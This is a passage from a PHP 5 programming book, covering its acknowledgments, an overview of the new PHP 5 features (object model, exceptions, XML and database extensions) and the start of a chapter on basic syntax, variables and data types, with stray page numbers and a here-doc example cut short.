This book could not have been written without feedback from our technical reviewers; therefore, we would like to thank Marcus Börger, Steph Fox, Martin Jansen, and Rob Richards for their excellent comments and feedback. Besides these four reviewers, there are a few more people who helped answer several questions during the writing of this book, more specifically Christian Stocker for helping with the XML chapter, Wez Furlong and Sara Golemon for answering questions about the streams layer, Pierre-Alain Joye for providing some insights into the inner workings of the GD library, and less specifically the PEAR community for their support and dedication to a great repository of usable PEAR components. Some sections in this book were contributed by co-authors: Georg Richter contributed the MySQLi section of the database chapter, and Zeev Suraski added the section on Zend's Performance Suite.

We would also like to thank Mark L. Taub and the editorial team of Pearson PTR for the things they are good at doing: organizing, planning, and marketing this book, and making sure everything fits together. Thanks to Janet Valade, for helpful developmental editing support, and our project editor Kristy Hart, who helped us wrap up the book under pressure and put the final touches on it.

Enjoy!

Andi, Stig, and Derick

CHAPTER 1

What Is New in PHP 5?

“The best way to be ready for the future is to invent it.” (John Sculley)

1.1 INTRODUCTION

Only time will tell if the PHP 5 release will be as successful as its two predecessors (PHP 3 and PHP 4). The new features and changes aim to rid PHP of any weaknesses it may have had and make sure that it stays in the lead as the world’s best web-scripting language.

This book details PHP 5 and its new features. However, if you are familiar with PHP 4 and are eager to know what is new in PHP 5, this chapter is for you.

When you finish reading this chapter, you will have learned
☞ The new language features
☞ News concerning PHP extensions
☞ Other noteworthy changes to PHP’s latest version

1.2 LANGUAGE FEATURES

1.2.1 New Object-Oriented Model

When Zeev Suraski added the object-oriented syntax back in the days of PHP 3, it was added as “syntactic sugar for accessing collections.” The OO model also had support for inheritance and allowed a class (and object) to aggregate both methods and properties, but not much more. When Zeev and Andi Gutmans rewrote the scripting engine for PHP 4, it was a completely new engine; it ran much faster, was more stable, and boasted more features. However, the OO model first introduced in PHP 3 was barely touched.

Although the object model had serious limitations, it was used extensively around the world, often in large PHP applications. This impressive use of the OOP paradigm with PHP 4, despite its weaknesses, led to it being the main focus for the PHP 5 release.

So, what were some of the limitations in PHP 3 and 4? The biggest limitation (which led to further limitations) was the fact that the copy semantics of objects were the same as for native types. So, how did this actually affect the PHP developer? When assigning a variable (that points to an object) to another variable, a copy of the object would be created. Not only did this impact performance, but it also usually led to obscure behavior and bugs in PHP 4 applications because many developers thought that both variables would point at the same object, which was not the case. The variables were instead pointing at separate copies of the same object. Changing one would not change the other.

For example:

    class Person {
        var $name;

        function getName()
        {
            return $this->name;
        }

        function setName($name)
        {
            $this->name = $name;
        }

        // PHP 4 style constructor: a method named after the class
        function Person($name)
        {
            $this->setName($name);
        }
    }

    function changeName($person, $name)
    {
        $person->setName($name);
    }

    $person = new Person("Andi");
    changeName($person, "Stig");
    print $person->getName();

In PHP 4, this code would print out "Andi". The reason is that we pass the object $person to the changeName() function by-value, and thus, $person is copied and changeName() works on a copy of $person.

This behavior is not intuitive, as many developers would expect the Java-like behavior. In Java, variables actually hold a handle (or pointer) to the object, and therefore, when it is copied, only the handle (and not the entire object) is duplicated.

There were two kinds of users in PHP 4: the ones who were aware of this problem and the ones who were not. The latter would usually not notice this problem, and their code was written in a way where it did not really matter if the problem existed. Surely some of these people had sleepless nights trying to track down weird bugs that they could not pinpoint.
The former group dealt with this problem by always passing and assigning objects by reference. This would prevent the engine from copying their objects, but it would be a headache because the code included numerous & signs.
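The difference between by-value and by-reference passing can still be observed on current PHP versions with native types. The following is a minimal sketch, not the book's own example: it assumes an array as a stand-in for a PHP 4 object (arrays are still copied when passed by value), and the two function names are hypothetical.

```php
<?php
// Hypothetical helper names; an array stands in for a PHP 4 object,
// because arrays are still copied when assigned or passed by value.
function changeNameByValue($person, $name)
{
    $person["name"] = $name;   // changes only the function's local copy
}

function changeNameByReference(&$person, $name)
{
    $person["name"] = $name;   // changes the caller's variable
}

$person = array("name" => "Andi");

changeNameByValue($person, "Stig");
$afterByValue = $person["name"];       // the caller's array is unchanged

changeNameByReference($person, "Stig");
$afterByReference = $person["name"];   // the caller's array was modified

print "$afterByValue, then $afterByReference\n";
```

The & in the parameter list is the same sign that PHP 4 developers had to sprinkle through their object-handling code.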

The old object model not only led to the aforementioned problems, but also to fundamental problems that prevented implementing some additional features on top of the existing object model.

In PHP 5, the infrastructure of the object model was rewritten to work with object handles. Unless you explicitly clone an object by using the clone keyword, you never create behind-the-scenes duplicates of your objects. In PHP 5, you don’t need to pass objects by reference or assign them by reference.

Note: Passing by reference and assigning by reference are still supported, in case you want to actually change a variable’s content (whether object or other type).

1.2.2 New Object-Oriented Features

The new OO features are too numerous to give a detailed description in this section. Chapter 3, “PHP 5 OO Language,” details each feature.

The following list provides the main new features:

☞ public/private/protected access modifiers for methods and properties.
Allows the use of common OO access modifiers to control access to methods and properties:

    class MyClass {
        private $id = 18;

        public function getId()
        {
            return $this->id;
        }
    }

☞ Unified constructor name __construct().
Instead of the constructor being the name of the class, it is now declared as __construct(), which makes it easier to shift classes inside class hierarchies:

    class MyClass {
        function __construct()
        {
            print "Inside constructor";
        }
    }

☞ Object destructor support by defining a __destruct() method.
Allows defining a destructor function that runs when an object is destroyed:

    class MyClass {
        function __destruct()
        {
            print "Destroying object";
        }
    }

☞ Interfaces.
Gives the ability for a class to fulfill more than one is-a relationship. A class can inherit only from one class, but may implement as many interfaces as it wants:

    interface Display {
        function display();
    }

    class Circle implements Display {
        function display()
        {
            print "Displaying circle\n";
        }
    }

☞ instanceof operator.
Language-level support for is-a relationship checking. The PHP 4 function is_a() is now deprecated:

    if ($obj instanceof Circle) {
        print '$obj is a Circle';
    }

☞ Final methods.
The final keyword allows you to mark methods so that an inheriting class cannot override them:

    class MyClass {
        final function getBaseClassName()
        {
            return __CLASS__;
        }
    }

☞ Final classes.
After declaring a class as final, it cannot be inherited. The following example would error out:

    final class FinalClass {
    }

    class BogusClass extends FinalClass {
    }

☞ Explicit object cloning.
To clone an object, you must use the clone keyword. You may declare a __clone() method, which will be called during the clone process (after the properties have been copied from the original object):

    class MyClass {
        function __clone()
        {
            print "Object is being cloned";
        }
    }

    $obj = new MyClass();
    $obj_copy = clone $obj;

☞ Class constants.
Class definitions can now include constant values, which are referenced using the class:

    class MyClass {
        const SUCCESS = "Success";
        const FAILURE = "Failure";
    }

    print MyClass::SUCCESS;

☞ Static methods.
You can now define methods as static by allowing them to be called from non-object context. Static methods do not define the $this variable because they are not bound to any specific object:

    class MyClass {
        static function helloWorld()
        {
            print "Hello, world";
        }
    }

    MyClass::helloWorld();

☞ Static members.
Class definitions can now include static members (properties) that are accessible via the class. Common usage of static members is in the Singleton pattern:

    class Singleton {
        static private $instance = NULL;

        private function __construct()
        {
        }

        static public function getInstance()
        {
            if (self::$instance == NULL) {
                self::$instance = new Singleton();
            }
            return self::$instance;
        }
    }
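The handle-based object model and the explicit cloning item above can be seen side by side in a few lines. This is a minimal sketch under stated assumptions: the Counter class and its members are hypothetical names chosen for illustration, and a class constant is used only to supply the starting value.

```php
<?php
// Hypothetical Counter class, used only for illustration.
class Counter
{
    const START = 0;               // class constant, read as Counter::START

    public $value = self::START;

    public function increment()
    {
        $this->value++;
    }
}

$a = new Counter();
$b = $a;          // copies the handle: $a and $b refer to the same object
$c = clone $a;    // explicit clone: $c is an independent copy

$a->increment();

// $b sees the change made through $a; the clone $c does not.
print $a->value . " " . $b->value . " " . $c->value . "\n";
```

Plain assignment is enough to share an object, so the & sign is only needed when the variable itself (rather than the object it refers to) must be changed.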

☞ Abstract classes.
A class may be declared abstract to prevent it from being instantiated. However, you may inherit from an abstract class:

    abstract class MyBaseClass {
        function display()
        {
            print "Default display routine being called";
        }
    }

☞ Abstract methods.
A method may be declared abstract, thereby deferring its definition to an inheriting class. A class that includes abstract methods must be declared abstract:

    abstract class MyBaseClass {
        abstract function display();
    }

☞ Class type hints.
Function declarations may include class type hints for their parameters. If the functions are called with an incorrect class type, an error occurs:

    function expectsMyClass(MyClass $obj)
    {
    }

☞ Support for dereferencing objects that are returned from methods.
In PHP 4, you could not directly dereference objects that were returned from methods. You had to first assign the object to a dummy variable and then dereference it.

PHP 4:

    $dummy = $obj->method();
    $dummy->method2();

PHP 5:

    $obj->method()->method2();

☞ Iterators.
PHP 5 allows both PHP classes and PHP extension classes to implement an Iterator interface. After you implement this interface, you can iterate instances of the class by using the foreach() language construct:

    $obj = new MyIteratorImplementation();
    foreach ($obj as $value) {
        print "$value";
    }
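The MyIteratorImplementation class in the Iterators item is left undefined, so a small concrete class may help. The sketch below is an assumption-laden illustration rather than the book's code: NumberRange is a hypothetical class, and the return type declarations assume PHP 7.1 or later (they keep newer PHP versions from emitting deprecation notices; under PHP 5 itself they would simply be omitted).

```php
<?php
// Hypothetical class; the return types assume PHP 7.1 or later.
class NumberRange implements Iterator
{
    private $start;
    private $end;
    private $current;

    public function __construct($start, $end)
    {
        $this->start = $start;
        $this->end = $end;
        $this->current = $start;
    }

    // foreach calls rewind() once, then valid(), current(), key(),
    // and next() on every pass through the loop.
    public function rewind(): void { $this->current = $this->start; }
    public function valid(): bool  { return $this->current <= $this->end; }
    public function current(): int { return $this->current; }
    public function key(): int     { return $this->current - $this->start; }
    public function next(): void   { $this->current++; }
}

$seen = array();
foreach (new NumberRange(1, 3) as $key => $value) {
    $seen[$key] = $value;
    print "$key => $value\n";
}
```

The loop never touches an array: every key and value it receives comes from the five methods of the object.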

For a more complete example, see Chapter 4, “PHP 5 Advanced OOP and Design Patterns.”

☞ __autoload().
Many developers writing object-oriented applications create one PHP source file per class definition. One of the biggest annoyances is having to write a long list of needed inclusions at the beginning of each script (one for each class). In PHP 5, this is no longer necessary. You may define an __autoload() function that is automatically called in case you are trying to use a class that has not been defined yet. By calling this function, the scripting engine offers one last chance to load the class before PHP bails out with an error:

    function __autoload($class_name)
    {
        // Assumes each class lives in a file named after the class
        include_once($class_name . ".php");
    }

    $obj = new MyClass1();
    $obj2 = new MyClass2();

1.2.3 Other New Language Features

☞ Exception handling.
PHP 5 adds support for the well-known structured try/throw/catch exception-handling paradigm. You are only allowed to throw objects that inherit from the Exception class:

    class SQLException extends Exception {
        public $problem;

        function __construct($problem)
        {
            $this->problem = $problem;
        }
    }

    try {
        ...
        throw new SQLException("Couldn't connect to database");
        ...
    } catch (SQLException $e) {
        print "Caught an SQLException with problem $e->problem";
    } catch (Exception $e) {
        print "Caught unrecognized exception";
    }

Currently, for backward-compatibility purposes, most internal functions do not throw exceptions. However, new extensions make use of this capability, and you can use it in your own source code. Also, similar to the already existing set_error_handler(), you may use set_exception_handler() to catch an unhandled exception before the script terminates.
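The exception-handling item can be tried end to end with a self-contained script. This is a minimal sketch, assuming hypothetical names throughout (ConnectionException, connect(), tryConnect(), lastResortHandler(), and the host name); the connection attempt is simulated and always fails so that the catch block runs.

```php
<?php
// Hypothetical exception class and function names, for illustration only.
class ConnectionException extends Exception
{
}

function connect($host)
{
    // Simulated failure: a real implementation would try to connect here.
    throw new ConnectionException("Couldn't connect to $host");
}

function tryConnect($host)
{
    try {
        connect($host);
        return "connected";
    } catch (ConnectionException $e) {
        // The most specific catch block that matches is used.
        return "caught: " . $e->getMessage();
    } catch (Exception $e) {
        return "caught unrecognized exception";
    }
}

// Last-resort handler for exceptions that nothing catches.
// It is registered here but not triggered by this script.
function lastResortHandler($e)
{
    print "Unhandled: " . $e->getMessage() . "\n";
}
set_exception_handler('lastResortHandler');

$result = tryConnect("db.example.com");
print $result . "\n";
```

Ordering the catch blocks from most specific to most general matters, because the first block whose class matches the thrown object wins.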

☞ foreach with references.
In PHP 4, you could not iterate through an array and modify its values. PHP 5 supports this by enabling you to mark the foreach() loop with the & (reference) sign, which makes any values you change affect the array over which you are iterating:

    foreach ($array as &$value) {
        if ($value === "NULL") {
            $value = NULL;
        }
    }

☞ Default values for by-reference parameters.
In PHP 4, default values could be given only to parameters that are passed by value. PHP 5 now supports giving default values to by-reference parameters:

    function my_func(&$arg = null)
    {
        if ($arg === NULL) {
            print '$arg is empty';
        }
    }

    my_func();

1.3 GENERAL PHP CHANGES

1.3.1 XML and Web Services

Following the changes in the language, the XML updates in PHP 5 are probably the most significant and exciting. The enhanced XML functionality in PHP 5 puts it on par with other web technologies in some areas and overtakes them in others.

1.3.1.1 The Foundation
XML support in PHP 4 was implemented using a variety of underlying XML libraries. SAX support was implemented using the old Expat library, XSLT was implemented using the Sablotron library (or using libxml2 via the DOM extension), and DOM was implemented using the more powerful libxml2 library by the GNOME project.

Using a variety of libraries did not make PHP 4 excel when it came to XML support. Maintenance was poor, new XML standards were not always supported, performance was not as good as it could have been, and interoperability between the various XML extensions did not exist.

In PHP 5, all XML extensions have been rewritten to use the superb libxml2 XML toolkit (http://www.xmlsoft.org/). It is a feature-rich, highly maintained, and efficient implementation of the XML standards that brings cutting-edge XML technology to PHP.

All the aforementioned extensions (SAX, DOM, and XSLT) now use libxml2, including the new additional extensions SimpleXML and SOAP.

1.3.1.2 SAX
As previously mentioned, the new SAX implementation has switched from using Expat to libxml2. Although the new extension should be compatible, some small, subtle differences might exist. Developers who still want to work with the Expat library can do so by configuring and building PHP accordingly (which is not recommended).

1.3.1.3 DOM
Although DOM support in PHP 4 was also based on the libxml2 library, it had bugs, memory leaks, and in many cases, the API was not W3C-compliant. The DOM extension went through a thorough facelift for PHP 5. Not only was the extension mostly rewritten, but now, it is also W3C-compliant. For example, function names now use studlyCaps as described by the W3C standard, which makes it easier to read general W3C documentation and implement what you have learned right away in PHP. In addition, the DOM extension now supports three kinds of schemas for XML validation: DTD, XML schema, and RelaxNG.

As a result of these changes, PHP 4 code using DOM will not always run in PHP 5. However, in most cases, adjusting the function names to the new standard will probably do the trick.

1.3.1.4 XSLT
In PHP 4, two extensions supported XSL Transformations: the Sablotron extension and the XSLT support in the DOM extension. PHP 5 features a new XSL extension and, as previously mentioned, it is based on the libxml2 library. In PHP 5, the XSL Transformation does not take the XSLT stylesheet as a parameter, but depends on the DOM extension to load it. The stylesheet can be cached in memory and may be applied to many documents, which saves execution time.

1.3.1.5 SimpleXML
When looking back in a year or two, it will be clear that SimpleXML revolutionized the way PHP developers work with XML files.
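Instead of having to deal with DOM or (even worse) SAX, SimpleXML represents your XML file as a native PHP object. You can read, write, or iterate over your XML file with ease, accessing elements and attributes.

Consider the following XML file:

    <clients>
        <client>
            <name>John Doe</name>
            <account_number>87234838</account_number>
        </client>
        <client>
            <name>Janet Smith</name>
            <account_number>72384329</account_number>
        </client>
    </clients>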

The following code prints each client’s name and account number:

    $clients = simplexml_load_file('clients.xml');
    foreach ($clients->client as $client) {
        print "$client->name has account number $client->account_number\n";
    }

It is obvious how simple SimpleXML really is.

In case you need to implement an advanced technique in your SimpleXML object that is not supported in this lightweight extension, you can convert it to a DOM tree by calling dom_import_simplexml(), manipulate it in DOM, and convert it back to SimpleXML using simplexml_import_dom(). Thanks to both extensions using the same underlying XML library, switching between them is now a reality.

1.3.1.6 SOAP
PHP 4 lacked official native SOAP support. The most commonly used SOAP implementation was PEAR’s, but because it was implemented entirely in PHP, it could not perform as well as a built-in C extension. Other available C extensions never reached stability and wide adoption and, therefore, were not included in the main PHP 5 distribution.

SOAP support in PHP 5 was completely rewritten as a C extension and, although it was only completed at a very late stage in the beta process, it was incorporated into the default distribution because of its thorough implementation of most of the SOAP standard.

The following calls SomeFunction() defined in a WSDL file:

    $client = new SoapClient("some.wsdl");
    $client->SomeFunction($a, $b, $c);

1.3.1.7 New MySQLi (MySQL Improved) Extension
For PHP 5, MySQL AB (http://www.mysql.com) has written a new MySQL extension that enables you to take full advantage of the new functionality in MySQL 4.1 and later. As opposed to the old MySQL extension, the new one gives you both a functional and an OO interface so that you can choose what you prefer.
New features supported by this extension include prepared statements and variable binding, SSL and compressed connections, transaction control, replication support, and more.

1.3.1.8 SQLite Extension
Support for SQLite (http://www.sqlite.org) was first introduced in the PHP 4.3.x series. It is an embedded SQL library that does not require an SQL server, so it is suitable for applications that do not require the scalability of SQL servers or if you deploy at an ISP that does not

offer access to an SQL server. Contrary to what its name implies, SQLite has many features and supports transactions, sub-selects, views, and large database files. It is mentioned here as a PHP 5 feature because it was introduced so late in the PHP 4 series, and because it takes advantage of PHP 5 by providing an OO interface and supporting iterators.

1.3.1.9 Tidy Extension
PHP 5 includes support for the useful Tidy (http://tidy.sf.net/) library. It enables PHP developers to parse, diagnose, clean, and repair HTML documents. The Tidy extension supports both a functional and an OO interface, and its API uses the PHP 5 exception mechanism.

1.3.1.10 Perl Extension
Although not bundled in the default PHP 5 package, the Perl extension allows you to call Perl scripts, use Perl objects, and use other Perl functionality natively from within PHP. This new extension sits within the PECL (PHP Extension Community Library) repository at http://pecl.php.net/package/perl.

1.4 OTHER NEW FEATURES IN PHP 5

This section discusses new features introduced in PHP 5.

1.4.1 New Memory Manager

The Zend Engine features a new memory manager. The two main advantages are better support for multi-threaded environments (allocations do not need to perform any mutual exclusion locks) and more efficient freeing of the allocated memory blocks after each request. Because this is an underlying infrastructure change, you will not notice it directly as the end user.

1.4.2 Dropped Support for Windows 95

Running PHP on the Windows 95 platform is not supported anymore because Windows 95 does not support the functionality that PHP uses. Because Microsoft officially stopped supporting it in 2002, the PHP development community decided that dropping the support was a wise decision.

1.5 SUMMARY

You must surely be impressed by the number of improvements in PHP 5.
As previously mentioned, this chapter does not cover all the improvements, but only the main ones. Other improvements include additional features, many bug fixes, and a much-improved infrastructure. The following chapters cover PHP 5 and give you in-depth coverage of the named new features and others that were not mentioned in this chapter.


CHAPTER 2

PHP 5 Basic Language

“A language that doesn’t have everything is actually easier to program in than some that do.” (Dennis M. Ritchie)

2.1 INTRODUCTION

PHP borrows a bit of its syntax from other languages such as C, shell, Perl, and even Java. It is really a hybrid language, taking the best features from other languages and creating an easy-to-use and powerful scripting language.

When you finish reading this chapter, you will have learned
☞ The basic language structure of PHP
☞ How PHP is embedded in HTML
☞ How to write comments
☞ Managing variables and basic data types
☞ Defining constants for simple values
☞ The most common control structures, most of which are available in other programming languages
☞ Built-in or user-defined functions

If you are an experienced PHP 4 developer, you might want to skip to the next chapter, which covers object-oriented support of the language that has changed significantly in PHP 5.

2.2 HTML EMBEDDING

The first thing you need to learn about PHP is how it is embedded in HTML:

    <HTML>
    <HEAD>Sample PHP Script</HEAD>
    <BODY>
    The following prints "Hello, World":
    <?php
        print "Hello, World";
    ?>
    </BODY>
    </HTML>

In this example, you see that your PHP code sits embedded in your HTML, between the <?php open tag and the closing ?> marker. PHP then replaces that PHP code with its output (if there is any) while any non-PHP text (such as HTML) is passed through as-is to the web client. Thus, running the mentioned script would lead to the following output:

    <HTML>
    <HEAD>Sample PHP Script</HEAD>
    <BODY>
    The following prints "Hello, World":
    Hello, World
    </BODY>
    </HTML>

Tip: You may also use a shorter <? as the PHP open tag if you enable the short_open_tag INI option.

2.3 COMMENTS

PHP supports three comment styles:

☞ C way

    /* This is a C like comment
     * which can span multiple
     * lines until the closing tags
     */

☞ C++ way

    // This is a C++ like comment which ends at the end of the line

☞ Shell way

    # This is a shell like comment which ends at the end of the line

2.4 VARIABLES

Variables in PHP are quite different from those in compiled languages such as C and Java. This is because of their weakly typed nature, which in short means you don’t need to declare variables before using them, you don’t need to declare their type and, as a result, a variable can change the type of its value as often as you want.

Variables in PHP are preceded with a $ sign, and similar to most modern languages, they can start with a letter (A-Za-z) or _ (underscore) and can then contain as many alphanumeric characters and underscores as you like.

Examples of legal variable names include

    $count
    $_Obj
    $A123

Examples of illegal variable names include

    $123
    $*ABC

As previously mentioned, you don’t need to declare variables or their type before using them in PHP. The following code example uses variables:

    $PI = 3.14;
    $radius = 5;
    $circumference = $PI * 2 * $radius; // Circumference = π * d

You can see that none of the variables are declared before they are used. Also, the fact that $PI is a floating-point number and $radius is an integer is not declared before they are initialized.

PHP does not support global variables like many other programming languages (except for some special pre-defined variables, which we discuss later). Variables are local to their scope, and if created in a function, they are only available for the lifetime of the function. Variables that are created in the main script (not within a function) aren’t global variables; you cannot see

them inside functions, but you can access them by using a special array $GLOBALS[], using the variable’s name as the string offset. The previous example can be rewritten the following way:

    $PI = 3.14;
    $radius = 5;
    $circumference = $GLOBALS["PI"] * 2 * $GLOBALS["radius"]; // Circumference = π * d

You might have realized that even though all this code is in the main scope (we didn’t make use of functions), you are still free to use $GLOBALS[], although in this case, it gives you no advantage.

2.4.1 Indirect References to Variables

An extremely useful feature of PHP is that you can access variables by using indirect references, or to put it simply, you can create and access variables by name at runtime.

Consider the following example:

    $name = "John";
    $$name = "Registered user";
    print $John;

This code results in the printing of "Registered user".

The second line uses an additional $ to access the variable with the name specified by the value of $name ("John") and changes its value to "Registered user". Therefore, a variable called $John is created.

You can use as many levels of indirection as you want by adding additional $ signs in front of a variable.

2.4.2 Managing Variables

Three language constructs are used to manage variables. They enable you to check if certain variables exist, remove variables, and check variables’ truth values.

2.4.2.1 isset()
isset() determines whether a certain variable has already been declared by PHP. It returns a boolean value true if the variable has already been set, and false otherwise, or if the variable is set to the value NULL.

Consider the following script:

    if (isset($first_name)) {
        print '$first_name is set';
    }

This code snippet checks whether the variable $first_name is defined. If $first_name is defined, isset() returns true, which will display '$first_name is set'. If it isn’t, no output is generated.
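The scope rule and the indirect references described in sections 2.4 and 2.4.1 can be checked with a short script. This is a minimal sketch with hypothetical function names; it assumes the code runs as a main script (not wrapped inside another function), so that $radius is created in the main scope.

```php
<?php
$radius = 5;   // created in the main script

function radiusInsideFunction()
{
    // The main-script $radius is not visible in this scope.
    return isset($radius);
}

function radiusViaGlobals()
{
    // The $GLOBALS array exposes main-script variables by name.
    return $GLOBALS["radius"];
}

$visibleInFunction = radiusInsideFunction();
$viaGlobals = radiusViaGlobals();

// Indirect reference: the value of $name becomes a variable name.
$name = "John";
$$name = "Registered user";

var_dump($visibleInFunction);
print "$viaGlobals $John\n";
```

Inside radiusInsideFunction(), $radius is simply a different, undefined local variable, which is why the isset() check there fails.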

isset() can also be used on array elements (discussed in a later section) and object properties. Here are examples for the relevant syntax, which you can refer to later:

☞ Checking an array element:

    if (isset($arr["offset"])) {
        ...
    }

☞ Checking an object property:

    if (isset($obj->property)) {
        ...
    }

Note that in both examples, we didn’t check if $arr or $obj are set (before we checked the offset or property, respectively). The isset() construct returns false automatically if they are not set.

Unlike empty(), isset() accepts an arbitrary number of parameters. Its accurate prototype is as follows:

    isset($var1, $var2, $var3, ...);

It only returns true if all the variables have been defined; otherwise, it returns false. This is useful when you want to check if the required input variables for your script have really been sent by the client, saving you a series of single isset() checks.

2.4.2.2 unset()
unset() “undeclares” a previously set variable, and frees any memory that was used by it if no other variable references its value. A call to isset() on a variable that has been unset() returns false.

For example:

    $name = "John Doe";
    unset($name);
    if (isset($name)) {
        print '$name is set';
    }

This example will not generate any output, because isset() returns false.

unset() can also be used on array elements and object properties similar to isset().
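The isset() and unset() rules above can be exercised together. The following is a minimal sketch; the $form array and its keys are hypothetical stand-ins for input sent by a client, and $missing is deliberately never defined.

```php
<?php
// Hypothetical form data standing in for client input.
$form = array("first_name" => "John", "last_name" => "Doe", "age" => null);

// One isset() call with several parameters replaces a series of single checks.
$hasFullName = isset($form["first_name"], $form["last_name"]);

// A variable (or element) set to NULL counts as not set.
$hasAge = isset($form["age"]);

// Checking an offset of an undefined array is safe and yields false.
$hasMissing = isset($missing["offset"]);

// After unset(), the element is gone, so the combined check fails.
unset($form["last_name"]);
$hasFullNameAfterUnset = isset($form["first_name"], $form["last_name"]);

var_dump($hasFullName, $hasAge, $hasMissing, $hasFullNameAfterUnset);
```

Only the first check succeeds; the NULL value, the undefined array, and the unset element all make isset() return false.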

46

2.4.2.3 empty()

empty() may be used to check whether a variable has not been declared or its value is false. This language construct is usually used to check whether a form variable has not been sent or does not contain data. When checking a variable's truth value, its value is first converted to a Boolean according to the rules in the following section, and then it is checked for true/false. For example:

    if (empty($name)) {
        print 'Error: Forgot to specify a value for $name';
    }

This code prints an error message if $name doesn't contain a value that evaluates to true.

2.4.3 Superglobals

As a general rule, PHP does not support global variables (variables that can automatically be accessed from any scope). However, certain special internal variables behave like the global variables of other languages. These variables are called superglobals and are predefined by PHP for you to use. Some examples of these superglobals are

☞ $_GET[]. An array that includes all the GET variables that PHP received from the client browser.
☞ $_POST[]. An array that includes all the POST variables that PHP received from the client browser.
☞ $_COOKIE[]. An array that includes all the cookies that PHP received from the client browser.
☞ $_ENV[]. An array with the environment variables.
☞ $_SERVER[]. An array with the values of the web-server variables.

These superglobals and others are detailed in Chapter 5, "How to Write a Web Application with PHP." On a language level, it is important to know that you can access these variables anywhere in your script, whether in function, method, or global scope. You don't have to use the $GLOBALS[] array, which allows for accessing global variables without having to predeclare them or use the discouraged global keyword.

2.5 BASIC DATA TYPES

Eight different data types exist in PHP, five of which are scalar and each of the remaining three has its own uniqueness. The previously discussed variables can contain values of any of these data types without explicitly declaring their type. The variable "behaves" according to the data type it contains.
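As a small sketch of a variable "behaving" according to the value it currently holds, the following reassigns one variable several times and records the type reported by gettype(). The variable names are arbitrary.

```php
<?php
// The same variable can hold values of different types over its lifetime.
$value = 42;
$types = array(gettype($value));

$value = 3.14;
$types[] = gettype($value);   // PHP reports floating-point values as "double"

$value = "forty-two";
$types[] = gettype($value);

$value = array(4, 2);
$types[] = gettype($value);

print implode(", ", $types) . "\n";   // integer, double, string, array
```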

47

2.5.1 Integers

Integers are whole numbers and are equivalent in range to your C compiler's long value. On many common machines, such as Intel Pentiums, that means a 32-bit signed integer with a range from -2,147,483,648 to +2,147,483,647.

Integers can be written in decimal, hexadecimal (prefixed with 0x), and octal notation (prefixed with 0), and can include +/- signs. Some examples of integers include

    240000
    0xABCD
    007
    -100

Note: As integers are signed, the right shift operator in PHP always does a signed shift.

2.5.2 Floating-Point Numbers

Floating-point numbers (also known as real numbers) represent real numbers and are equivalent to your platform C compiler's double data type. On common platforms, the data type size is 8 bytes and it has a range of approximately 2.2E-308 to 1.8E+308. Floating-point numbers include a decimal point and can include a +/- sign and an exponent value.

Examples of floating-point numbers include

    3.14
    +0.9e-2
    -170000.5
    54.6E42

2.5.3 Strings

Strings in PHP are a sequence of characters that are always internally null-terminated. However, unlike some other languages, such as C, PHP does not rely on the terminating null to calculate a string's length, but remembers its length internally. This allows for easy handling of binary data in PHP, for example, creating an image on-the-fly and outputting it to the browser. The maximum length of strings varies according to the platform and C compiler, but you can expect it to support at least 2GB. Don't write programs that test this limit because you're likely to first reach your memory limit.

When writing string values in your source code, you can use double quotes ("), single quotes ('), or here-docs to delimit them. Each method is explained in this section.
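The integer notations and the length-aware handling of strings described above can be checked with a short sketch. The variable names are illustrative; PHP_INT_MAX is a predefined constant that reports the largest integer on the platform running the script.

```php
<?php
// The same integer written in decimal, hexadecimal, and octal notation.
$decimal = 255;
$hex     = 0xFF;
$octal   = 0377;
$same    = ($decimal === $hex && $hex === $octal);

// A string with an embedded null byte: strlen() counts all five bytes
// because PHP stores the length instead of scanning for a terminator.
$binary = "ab\0cd";
$length = strlen($binary);

// On a 32-bit platform this is exactly 2147483647; on 64-bit it is larger.
$atLeast32Bit = (PHP_INT_MAX >= 2147483647);

var_dump($same, $length, $atLeast32Bit);
```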

48

2.5.3.1 Double Quotes

Examples for double quotes:

    "PHP: Hypertext Pre-processor"
    "GET / HTTP/1.0\n"
    "1234567890"

Strings can contain pretty much all characters. Some characters can't be written as is, however, and require special notation:

    \n                   Newline.
    \t                   Tab.
    \"                   Double quote.
    \\                   Backslash.
    \0                   ASCII 0 (null).
    \r                   Carriage return.
    \$                   Escape the $ sign so that it is not treated as a variable but as the character $.
    \{Octal #}           The character represented by the specified octal # (for example, \70 represents the character 8).
    \x{Hexadecimal #}    The character represented by the specified hexadecimal # (for example, \x32 represents the character 2).

An additional feature of double-quoted strings is that certain notations of variables and expressions can be embedded directly within them. Without going into specifics, here are some examples of legal strings that embed variables. The references to variables are automatically replaced with the variables' values, and if the values aren't strings, they are converted to their corresponding string representations (for example, the integer 123 would be first converted to the string "123").

    "The result is $result\n"
    "The array offset $i contains $arr[$i]"

In cases where you'd like to concatenate strings with values (such as variables and expressions) and this syntax isn't sufficient, you can use the . (dot) operator to concatenate two or more strings. This operator is covered in a later section.

2.5.3.2 Single Quotes

In addition to double quotes, single quotes may also delimit strings. However, in contrast to double quotes, single quotes do not support all the double quotes' escaping and variable substitution.

The following table includes the only two escapings supported by single quotes:

    \'    Single quote.
    \\    Backslash, used when wanting to represent a backslash followed by a single quote (for example, \\').

49

Examples:

    'Hello, World'
    'Today\'s the day'

2.5.3.3 Here-Docs

Here-docs enable you to embed large pieces of text in your scripts, which may include lots of double quotes and single quotes, without having to constantly escape them.

The following is an example of a here-doc:

    <<
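The three ways of delimiting strings can be compared side by side. The following is a sketch written for illustration, not the book's own listing; the identifier THE_END and the variable names are arbitrary choices.

```php
<?php
$name = "World";

// Double quotes: escapes are interpreted and variables are substituted.
$double = "Hello, $name\n";

// Single quotes: only \' and \\ are special, so $name and \n stay literal.
$single = 'Hello, $name\n';

// Here-doc: variables are substituted as in double quotes, but embedded
// quotes need no escaping. The closing identifier starts its own line.
$heredoc = <<<THE_END
"Hello", said 'someone' to $name.
THE_END;

print $double;
print $single . "\n";
print $heredoc . "\n";
```

The here-doc form pays off mostly for longer blocks of text, such as HTML fragments, where escaping every quote would hurt readability.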

50

Note: In PHP 4, you could use [] (square brackets) to access string offsets. This support still exists in PHP 5, and you are likely to bump into it often. However, you should really use the {} notation because it differentiates string offsets from array offsets and thus makes your code more readable.

2.5.4 Booleans

Booleans were introduced for the first time in PHP 4 and didn't exist in prior versions. A Boolean value can be either true or false.

As previously mentioned, PHP automatically converts types when needed. Boolean is probably the type that other types are most often converted to behind the scenes. This is because, in any conditional code such as if statements, loops, and so on, types are converted to this scalar type to check if the condition is satisfied. Also, comparison operators result in a Boolean value.

Consider the following code fragment:

    $numerator = 1;
    $denominator = 5;
    if ($denominator == 0) {
        print "The denominator needs to be a non-zero number\n";
    }

